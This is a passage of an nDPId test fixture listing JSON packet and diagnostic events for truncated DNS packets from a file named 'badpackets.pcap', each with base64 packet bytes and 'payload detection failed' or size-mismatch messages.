5zuubhya+m8F77ALS9J5tlbCttYJ6tsWrAWvxZvM87YLEbRmfylsEoL24zWSfS1TTw5laQQ+fFMlcxwsBlJgrMeczcBt336cIqfmIKeERJTEg+OrOLdO0XjsDHFLDyhLL\/bZhwjIblHHNFEOFpMgZmP2CNywzyTKtrZ66YyjiVE9dWHBonoNAXYZUpXwWyWRT3+oDLNyQllT7gKVEFSftnJhmVmesUECCPtmavZBL3HbaFxB6sWH7vflWaWhlpfBlQABAAEAAVGAAASMWiHtwZUAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8GBAAEAAQABUYAABIysEe3BgQAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wW0AAQABAAFRgAAEoTcgAsFtABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBlQAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GVAC4AAQABUYAB"} 01859{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1191,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW2cgADURSHGMrBHtzLpQ5QA1l38KTYdoHVOEEAABAAIABAANA3d3dwZub2hyc2MBbARub2FhA2dvdgAAAQABwAwAAQABAAAAHgAEwC5sA8AMAC4AAQAAAB4BHgABBQUAAAAeWSvzElkiuJLWCwFsBG5vYWEDZ292AEmbFbdVf7FrZdNM0IbcWdEpLfLseHOhwkbd9Xyz04fYyQrhx+Jovb0Em+GuaroqiO5SKtEQJqVCCZB9p842uoKxho+pPpdJyWiQc7GnXhWdDNWtJHOkPmoq3wrf3jfnkFfPCy15tQqxwItlfzeoXa47K\/rbLzji9J6Cj82yysecO7bElXtCuXkKPdBLHf390b9a43nJCO8borqU1G0mIjq1zfMZZF6Kibws4+mFg0EdoxSpF65NctKwuurIJVArvCE11J8PbHegAuvbVEpvXwtS4p8hvMfMnJvNSqKpfuQhDV7nHNaRPD8uISM\/x8CbB8jQLQpUussqmlC6PtCbdXfAVQACAAEAAVGAAAgFbnMtbnfAV8BVAAIAAQABUYAACAVucy1td8BXwFUAAgABAAFRgAAHBG5zLWXAV8BVAC4AAQABUYABHgACBQMAAVGAWSvzElkiuJLWCwFsBG5vYWEDZ292AB4urg2adWRw3FDYQJkcAS8IyLkxlgQvx50DthXGxvZQEYUgQaz\/QwI+NjmeMaR\/Wy5VNm1zDJPvm7aAWNmBbE\/X5zuubhya+m8F77ALS9J5tlbCttYJ6tsWrAWvxZvM87YLEbRmfylsEoL24zWSfS1TTw5laQQ+fFMlcxwsBlJgrMeczcBt336cIqfmIKeERJTEg+OrOLdO0XjsDHFLDyhLL\/bZhwjIblHHNFEOFpMgZmP2CNywzyTKtrZ66YyjiVE9dWHBonoNAXYZUpXwWyWRT3+oDLNyQllT7gKVEFSftnJhmVmesUECCPtmavZBL3HbaFxB6sWH7vflWaWhlpfBlQABAAEAAVGAAASMWiHtwZUAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8GBAAEAAQABUYAABIysEe3BgQAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wW0AAQABAAFRgAAEoTcgAsFtABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBlQAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GVAC4AAQABUYAB"}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":35,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1157,"global_ts_msec":1495451311524} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1157,"global_ts_msec":1495451311524}
01008{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":36,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":538,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":538,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcm2UgADwRZEWcmp8szLpQ5QA1q4QHwM\/ij\/aEAAABAAkAAAABBWNpc2NvAAAwAAHADAAwAAEAABwgAIgBAAMIAwEAAdRGl1LNWnzy7pAEJi3Qfp0TyGaJmTkZh6eXbbqBdkY9a1AoaD29yVHLBBpWMSQjH95pwspn6IcXgzevKG6XFhwPNM+E0S7Ju2k\/7H2VuFBNC29dnwoJg4icT5epf3G8zmCaNYnLVZLs5atUCkBlhgvwscnvv\/TSmgpTXYQuqFu\/wAwAMAABAAAcIACIAQADCAMBAAGb2PYROIXk7P7qLTWvxVk3g1BsHjHVl72rmOzt5smqLLn23qp74hnC88zJUUWv21Kqy8BhoPdBWvuS3K8EynHYxDv8VO+YXAgqPkxai26z4TwjzZmHJVKWTKIiQzsakq\/w839oY5NLQsHtKpX4hQW\/\/wsieSUyQBsu2l28RS8I1cAMADAAAQAAHCABCAEBAwgDAQABygOnV9ghCwCrh3eIvDoG++8o80Fto28a\/p6JEdC+lLUNcG3Y9tAyIDCo8XUGee3bePYL4ZzXyCqJp7IksLLiu1iB6COA3ZuzD54vWOW2TJDtbTnlLS\/u7yD3YgI8LRcGSwoN2sUUDjhQxtd1fWfVIvI03XN5eQAXgcBIZZGdNKBR\/XOzYiDors4mheJ4ps\/1KYBH9kdGGiRmovRgfQ=="} 00994{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":538,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":538,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcm2UgADwRZEWcmp8szLpQ5QA1q4QHwM\/ij\/aEAAABAAkAAAABBWNpc2NvAAAwAAHADAAwAAEAABwgAIgBAAMIAwEAAdRGl1LNWnzy7pAEJi3Qfp0TyGaJmTkZh6eXbbqBdkY9a1AoaD29yVHLBBpWMSQjH95pwspn6IcXgzevKG6XFhwPNM+E0S7Ju2k\/7H2VuFBNC29dnwoJg4icT5epf3G8zmCaNYnLVZLs5atUCkBlhgvwscnvv\/TSmgpTXYQuqFu\/wAwAMAABAAAcIACIAQADCAMBAAGb2PYROIXk7P7qLTWvxVk3g1BsHjHVl72rmOzt5smqLLn23qp74hnC88zJUUWv21Kqy8BhoPdBWvuS3K8EynHYxDv8VO+YXAgqPkxai26z4TwjzZmHJVKWTKIiQzsakq\/w839oY5NLQsHtKpX4hQW\/\/wsieSUyQBsu2l28RS8I1cAMADAAAQAAHCABCAEBAwgDAQABygOnV9ghCwCrh3eIvDoG++8o80Fto28a\/p6JEdC+lLUNcG3Y9tAyIDCo8XUGee3bePYL4ZzXyCqJp7IksLLiu1iB6COA3ZuzD54vWOW2TJDtbTnlLS\/u7yD3YgI8LRcGSwoN2sUUDjhQxtd1fWfVIvI03XN5eQAXgcBIZZGdNKBR\/XOzYiDors4mheJ4ps\/1KYBH9kdGGiRmovRgfQ=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":36,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":504,"global_ts_msec":1495451320578} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":36,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":504,"global_ts_msec":1495451320578}
01347{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":37,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":791,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":791,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc0esgADMR6diEowQKzLpQ5QA1Y8kIvV9wUR6EEAABAAMABAANBnRpbWUtYgh0aW1lZnJlcQdibGRyZG9jA2dvdgAAAQABwAwAAQABAAAHCAAEhKMEZsAMAC4AAQAABwgAnwABBwQAAAcIWSrzRVkhuCFcsQdibGRyZG9jA2dvdgCz4vohuOo\/ZN1uNZLF+UDD3qHzJ2C3tMHOSiioVq033RO+ipzXapwQ4E4BS5zpIr923AlaL\/9WhCQy\/1Y1em3YZ3AdccyxO0gssoEPbElS149\/ac9HrbYG6d20TbbVB+VxK1L4MHmWOCcJMgpGO42vZ1KmHAZxDSlAli+HvMzpRsAMAC4AAQAABwgAnwABBwQAAAcIWSrzRVkhuCGY5AdibGRyZG9jA2dvdgBW5VUxo2FURuhTFYytwadnYHGDoScx7bGNWmJUvbniq24ec9+NK5A\/tqH7Lb1b3crN9Prt\/g\/MsebeMzTxodqie2+H6hdDZbplhskKnOEu5xRS1cUQfYmye\/wwniirGeCr1GVyInNfmb1RMzIVhXHumDFYR5pqMpRB66Ew29Kp48EGAAIAAQAABwgACwNnZWEEbmlzdMEOwQYAAgABAAAHCAAGA2JlYcGjwQYALgABAAAHCACfAAIHAgAABwhZKrf2WSF4GVyxB2JsZHJkb2MDZ292AIkzKBspRRKHjgld2iUJ6W8EI2\/ErlCgV4JOh1mMYrKJbPVKhaRdiPCnaxtYShzkiY056+AEL\/F04B\/Iv+WE6BOSfqWIKu831nLLehhatNc+0QoMG8piwdYZemWzDmmM\/mnqv45r3JwAgEQFHE9f4xPdbzXzBXCIN46nN8sxYcwUwdoALgABAAAHCACfAAIHAgAABwhZKrf2WSF4GZjkB2JsZHJkb2MDZ292AESJxFFnLylJJ50F\/EEyc6PhRchiACYL\/AlcnWeas5mQ0gG8Z\/ObR2D2qfguVUaT0TQMgn0akP1qC+VS8lFO0ft06e+8c5Y27dzgbK173tMxr5wtnClaCLjSQH8="} 01333{"packet_event_id":1,"packet_event_name":"packet","packet_id":37,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":791,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":791,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc0esgADMR6diEowQKzLpQ5QA1Y8kIvV9wUR6EEAABAAMABAANBnRpbWUtYgh0aW1lZnJlcQdibGRyZG9jA2dvdgAAAQABwAwAAQABAAAHCAAEhKMEZsAMAC4AAQAABwgAnwABBwQAAAcIWSrzRVkhuCFcsQdibGRyZG9jA2dvdgCz4vohuOo\/ZN1uNZLF+UDD3qHzJ2C3tMHOSiioVq033RO+ipzXapwQ4E4BS5zpIr923AlaL\/9WhCQy\/1Y1em3YZ3AdccyxO0gssoEPbElS149\/ac9HrbYG6d20TbbVB+VxK1L4MHmWOCcJMgpGO42vZ1KmHAZxDSlAli+HvMzpRsAMAC4AAQAABwgAnwABBwQAAAcIWSrzRVkhuCGY5AdibGRyZG9jA2dvdgBW5VUxo2FURuhTFYytwadnYHGDoScx7bGNWmJUvbniq24ec9+NK5A\/tqH7Lb1b3crN9Prt\/g\/MsebeMzTxodqie2+H6hdDZbplhskKnOEu5xRS1cUQfYmye\/wwniirGeCr1GVyInNfmb1RMzIVhXHumDFYR5pqMpRB66Ew29Kp48EGAAIAAQAABwgACwNnZWEEbmlzdMEOwQYAAgABAAAHCAAGA2JlYcGjwQYALgABAAAHCACfAAIHAgAABwhZKrf2WSF4GVyxB2JsZHJkb2MDZ292AIkzKBspRRKHjgld2iUJ6W8EI2\/ErlCgV4JOh1mMYrKJbPVKhaRdiPCnaxtYShzkiY056+AEL\/F04B\/Iv+WE6BOSfqWIKu831nLLehhatNc+0QoMG8piwdYZemWzDmmM\/mnqv45r3JwAgEQFHE9f4xPdbzXzBXCIN46nN8sxYcwUwdoALgABAAAHCACfAAIHAgAABwhZKrf2WSF4GZjkB2JsZHJkb2MDZ292AESJxFFnLylJJ50F\/EEyc6PhRchiACYL\/AlcnWeas5mQ0gG8Z\/ObR2D2qfguVUaT0TQMgn0akP1qC+VS8lFO0ft06e+8c5Y27dzgbK173tMxr5wtnClaCLjSQH8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":37,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":757,"global_ts_msec":1495451362335} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":37,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":757,"global_ts_msec":1495451362335}
00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc76ogADkRkB1F\/HitzLpQ5QA1x5kF4D53demEAAABAAUABgABE2NlZA=="} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc76ogADkRkB1F\/HitzLpQ5QA1x5kF4D53demEAAABAAUABgABE2NlZA=="}
00246{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","size":58,"expected":60,"global_ts_msec":1495451391978} 00232{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","size":58,"expected":60,"global_ts_msec":1495451391978}
00355{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc76ogADkRkB1F\/HitzLpQ5QA1x5kF4D53demEAAABAAUABgABE2NlZA=="} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc76ogADkRkB1F\/HitzLpQ5QA1x5kF4D53demEAAABAAUABgABE2NlZA=="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":24,"global_ts_msec":1495451391978} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":38,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":24,"global_ts_msec":1495451391978}
01013{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":39,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":548,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcVF0gADYRwvybxo5RzLpQ5QA1bA4Hyoducg+EEAABAAIABQARA3d3dwV1bmlvbgJpYwJhYwJ1awAAAQABwAwAAQABAAADhAAEm8YDk8AMAC4AAQAAA4QAnAABBQUAAAOEWTixhlkRIPO5jgJpYwJhYwJ1awAj5WoAxYCg\/KfcFTNasuFz9k8DHEEKP+G\/QcO+tlENP2jc3LgZ9uA3IooVGcjqo3IK1WfQBCEvktqfQAxH7Wa9Cf7eUtirbKINvr5+kMLn6FCrM9jd2dQe6Y6pYaAdpbMZ52VbSjqrMzklY\/zIDFORoxkTs1i+ORgrFMtdeV2yqMBSAAIAAQABUYAABgNuczLAUsBSAAIAAQABUYAABgNuczDAUsBSAAIAAQABUYAABgNuczHAUsBSAAIAAQABUYAAEwhhdXRoZG5zMQNjc3gDY2FtwFXAUgAuAAEAAVGAAJwAAgUDAAFRgFk3Fx9ZD4ShuY4CaWMCYWMCdWsAnce7m9M5vKhQqwhA2lgPqBNkvCE04UYgFElS0HI7a2i+uOQGzkCRUhlt88i15\/SW6pLNi7d1z4bwWT4IQO6zK9DN8onRZwE2U9p3OkmdXoT+m92MCVkssnEnbW4QP7TpPEflt6+tmQbWtQIhhbOmeIP69piuNsKdv\/4OLfIF3EjA+gABAAEAAVGAAASbxo5QwQwAAQABAAFRgAAEm8aOUcA="} 00999{"packet_event_id":1,"packet_event_name":"packet","packet_id":39,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":548,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcVF0gADYRwvybxo5RzLpQ5QA1bA4Hyoducg+EEAABAAIABQARA3d3dwV1bmlvbgJpYwJhYwJ1awAAAQABwAwAAQABAAADhAAEm8YDk8AMAC4AAQAAA4QAnAABBQUAAAOEWTixhlkRIPO5jgJpYwJhYwJ1awAj5WoAxYCg\/KfcFTNasuFz9k8DHEEKP+G\/QcO+tlENP2jc3LgZ9uA3IooVGcjqo3IK1WfQBCEvktqfQAxH7Wa9Cf7eUtirbKINvr5+kMLn6FCrM9jd2dQe6Y6pYaAdpbMZ52VbSjqrMzklY\/zIDFORoxkTs1i+ORgrFMtdeV2yqMBSAAIAAQABUYAABgNuczLAUsBSAAIAAQABUYAABgNuczDAUsBSAAIAAQABUYAABgNuczHAUsBSAAIAAQABUYAAEwhhdXRoZG5zMQNjc3gDY2FtwFXAUgAuAAEAAVGAAJwAAgUDAAFRgFk3Fx9ZD4ShuY4CaWMCYWMCdWsAnce7m9M5vKhQqwhA2lgPqBNkvCE04UYgFElS0HI7a2i+uOQGzkCRUhlt88i15\/SW6pLNi7d1z4bwWT4IQO6zK9DN8onRZwE2U9p3OkmdXoT+m92MCVkssnEnbW4QP7TpPEflt6+tmQbWtQIhhbOmeIP69piuNsKdv\/4OLfIF3EjA+gABAAEAAVGAAASbxo5QwQwAAQABAAFRgAAEm8aOUcA="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":39,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":514,"global_ts_msec":1495451394042} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":39,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":514,"global_ts_msec":1495451394042}
01190{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":40,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":673,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":673,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFYAXcBHwgADoRZJhCxpE3zLpQ5QA1pnIIR2qM4CyEEAABAAIAAwANAjcwATIBNgMyMTYHaW4tYWRkcgRhcnBhAAAMAAHADAAFAAEAAVGAAAgCNzACNjTAD8A1AAwAAQABUYAACQN1cDIDY29tAMA4AAIAAQABUYAAGgptYXR0ZXJob3JuCXRlbGVnbG9iZQNuZXQAwDgAAgABAAFRgAAJBmNhc3RvcsBpwDgAAgABAAFRgAAJBnBvbGx1eMBpwIQAAQABAAACWAAEQsaRY8CEABwAAQAAAlgAECABBaANAP\/\/AAAAAELGkWPAmQABAAEAAAJYAARCxpE3wJkAHAABAAACWAAQIAEFoA0A\/\/8AAAAAQsaRN8BeAAEAAQAAAlgABELGkQzAXgAcAAEAAAJYABAgAQWgDQD\/\/wAAAABCxpEMwIQALgABAAACWAEhAAEIAwAAAlhZKqfXWSGE3G6hCXRlbGVnbG9iZQNuZXQADWaWQ2KrMpM7yQCKVCdUF8CZsd8UuOLGe\/axb+Ay\/NWTVA3Zr0BSUADykeduIEZBBfslszxBCLtWJjw97buDzEvoJ6dPQ\/smffR9A7PBcA8vGMrx\/vYm0nKDfYKiwKXB3cayT61ofU5\/+O4eZ8mK7zyDd4NVmMUuKwz6hilRNOPFveA0ak+EzWMNuCSyDupcNYAy\/eZHdtxUD44NujGkG9U7ybrsgbYRculPaexgOKxu6wIMeuCHPGoausWOdwgGMsZ\/9a+crtZbVDgOKg2GuqdNoxaZcaB8m2G+d85wvTgybkqjMIcDjiFy8SOVvk1UORjiSqP3gTvApy\/X3t7tXsCEAC4AAQAAAlgBIQAcCAMAAAJYWSoEmVkgM1xuoQl0ZWxlZw=="} 01176{"packet_event_id":1,"packet_event_name":"packet","packet_id":40,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":673,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":673,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFYAXcBHwgADoRZJhCxpE3zLpQ5QA1pnIIR2qM4CyEEAABAAIAAwANAjcwATIBNgMyMTYHaW4tYWRkcgRhcnBhAAAMAAHADAAFAAEAAVGAAAgCNzACNjTAD8A1AAwAAQABUYAACQN1cDIDY29tAMA4AAIAAQABUYAAGgptYXR0ZXJob3JuCXRlbGVnbG9iZQNuZXQAwDgAAgABAAFRgAAJBmNhc3RvcsBpwDgAAgABAAFRgAAJBnBvbGx1eMBpwIQAAQABAAACWAAEQsaRY8CEABwAAQAAAlgAECABBaANAP\/\/AAAAAELGkWPAmQABAAEAAAJYAARCxpE3wJkAHAABAAACWAAQIAEFoA0A\/\/8AAAAAQsaRN8BeAAEAAQAAAlgABELGkQzAXgAcAAEAAAJYABAgAQWgDQD\/\/wAAAABCxpEMwIQALgABAAACWAEhAAEIAwAAAlhZKqfXWSGE3G6hCXRlbGVnbG9iZQNuZXQADWaWQ2KrMpM7yQCKVCdUF8CZsd8UuOLGe\/axb+Ay\/NWTVA3Zr0BSUADykeduIEZBBfslszxBCLtWJjw97buDzEvoJ6dPQ\/smffR9A7PBcA8vGMrx\/vYm0nKDfYKiwKXB3cayT61ofU5\/+O4eZ8mK7zyDd4NVmMUuKwz6hilRNOPFveA0ak+EzWMNuCSyDupcNYAy\/eZHdtxUD44NujGkG9U7ybrsgbYRculPaexgOKxu6wIMeuCHPGoausWOdwgGMsZ\/9a+crtZbVDgOKg2GuqdNoxaZcaB8m2G+d85wvTgybkqjMIcDjiFy8SOVvk1UORjiSqP3gTvApy\/X3t7tXsCEAC4AAQAAAlgBIQAcCAMAAAJYWSoEmVkgM1xuoQl0ZWxlZw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":40,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":639,"global_ts_msec":1495451408058} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":40,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":639,"global_ts_msec":1495451408058}
01049{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":41,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":568,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":568,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFCAXcCjcgADcRYglCxpFjzLpQ5QA1WQYH3k5\/2RyEEAABAAIAAwAJCm1hdHRlcmhvcm4JdGVsZWdsb2JlA25ldAAAHAABwAwAHAABAAACWAAQIAEFoA0A\/\/8AAAAAQsaRDMAMAC4AAQAAAlgBIQAcCAMAAAJYWSXcEFkcPtxuoQl0ZWxlZ2xvYmUDbmV0ACggce0e+l82m6K57G\/nkzZgF7\/\/\/F9ux6leX5Gn+5inty7\/MjZNahMqNAHQwnC8vBMYfHHAF8hSb7c8eCks0+Dh+nnbeUe4XgsM66nTr32JW46kbrQR89HZRJDZQZWC+piGiT97i3CT+WNQCbre\/CDP9NS8AgJkNfbP354St0OVmQlQhiKyrHqR2Kpg6iWBtjVOGzxTy9IEtmWsVcJvOfaeM\/T5fFq43DPnnWT055vSvfug0FyuSqsrvs\/uahkjmn0wSqWV9DY2l5rG7j2q5sqVxLwtjtu+3l3ZdAyTFxyFLOsRGViZqTvNnralxPJSMhvNxRaX7xgtnifsOR1srwrAZAACAAEAAAJYAA0DbnMyBmFzNjQ1M8BuwGQAAgABAAACWAAGA25zMcGDwGQALgABAAACWAEhAAIIAgAAAlhZKlysWSGE3G6hCXRlbGVnbG9iZQNuZXQAbS4gA1OJVXiOfiH1NhqitGHP\/bRoUOiALgkqpRDu8skb9xITGwMgLUOh4ksNJOEiOZjsYKQKyAOJP7f\/bfAaIkXhYw=="} 01035{"packet_event_id":1,"packet_event_name":"packet","packet_id":41,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":568,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":568,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFCAXcCjcgADcRYglCxpFjzLpQ5QA1WQYH3k5\/2RyEEAABAAIAAwAJCm1hdHRlcmhvcm4JdGVsZWdsb2JlA25ldAAAHAABwAwAHAABAAACWAAQIAEFoA0A\/\/8AAAAAQsaRDMAMAC4AAQAAAlgBIQAcCAMAAAJYWSXcEFkcPtxuoQl0ZWxlZ2xvYmUDbmV0ACggce0e+l82m6K57G\/nkzZgF7\/\/\/F9ux6leX5Gn+5inty7\/MjZNahMqNAHQwnC8vBMYfHHAF8hSb7c8eCks0+Dh+nnbeUe4XgsM66nTr32JW46kbrQR89HZRJDZQZWC+piGiT97i3CT+WNQCbre\/CDP9NS8AgJkNfbP354St0OVmQlQhiKyrHqR2Kpg6iWBtjVOGzxTy9IEtmWsVcJvOfaeM\/T5fFq43DPnnWT055vSvfug0FyuSqsrvs\/uahkjmn0wSqWV9DY2l5rG7j2q5sqVxLwtjtu+3l3ZdAyTFxyFLOsRGViZqTvNnralxPJSMhvNxRaX7xgtnifsOR1srwrAZAACAAEAAAJYAA0DbnMyBmFzNjQ1M8BuwGQAAgABAAACWAAGA25zMcGDwGQALgABAAACWAEhAAIIAgAAAlhZKlysWSGE3G6hCXRlbGVnbG9iZQNuZXQAbS4gA1OJVXiOfiH1NhqitGHP\/bRoUOiALgkqpRDu8skb9xITGwMgLUOh4ksNJOEiOZjsYKQKyAOJP7f\/bfAaIkXhYw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":41,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":534,"global_ts_msec":1495451408074} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":41,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":534,"global_ts_msec":1495451408074}
